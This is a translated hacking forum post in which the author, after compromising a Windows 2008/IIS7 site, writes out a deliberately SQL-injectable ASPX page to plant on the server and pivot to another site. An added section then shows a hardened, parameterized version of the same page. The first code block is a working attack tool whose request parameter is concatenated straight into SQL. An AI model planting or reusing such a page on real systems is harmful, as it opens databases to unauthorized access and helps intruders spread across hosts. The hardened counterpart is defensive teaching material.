Yesterday 4z1 and I looked at a site. Privilege escalation was very hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services...!
In the process we actually used a constructed ASPX injection page to cross over to another site. I found a pile of code online, and not one of them worked.
It's not much code, so I just wrote one myself. Annoying as hell.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Connection string is read from web.config; "连接名" is a placeholder for the ConnectionStrings entry name.
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1
    // Deliberately unparameterized: the request value is concatenated straight into the SQL text,
    // which is the injection point this page exists to provide. "表" and "列名" are placeholders for the table and column.
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery still runs the statement, but returns -1 for a SELECT; only non-query statements report a row count.
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n"); // echoes the raw parameter back, unencoded
    Response.Write(x);
    conn.Close();
}
</script>
</div>
</form>
</body>
</html>
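For comparison, the same lookup rebuilt as a hardened page (an added example, not the original author's code): the parameter is validated as an integer, bound as a SqlParameter instead of concatenated into the statement, and HTML-encoded before it is echoed. "MyDb", "[table]" and "column" are placeholder names standing in for the post's 连接名 / 表 / 列名.

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened counterpart of the injectable page above (added example).
    // "MyDb", "[table]" and "column" are placeholders for the real web.config entry, table and column.
    void Page_Init(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;
        // Reject anything that is not an integer instead of passing the raw string to SQL Server.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad request");
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["MyDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("SELECT COUNT(*) FROM [table] WHERE [column] = @id", conn))
        {
            // The value travels separately from the statement text, so it cannot alter the query's structure.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)cmd.ExecuteScalar();
            // Encode anything reflected from the request; the original page writes it back verbatim.
            Response.Write(HttpUtility.HtmlEncode(raw) + "\n");
            Response.Write(count);
        }
    }
</script>
```

Both connections are wrapped in `using` so they are closed even when the query throws, which the original page's bare `conn.Close()` does not guarantee.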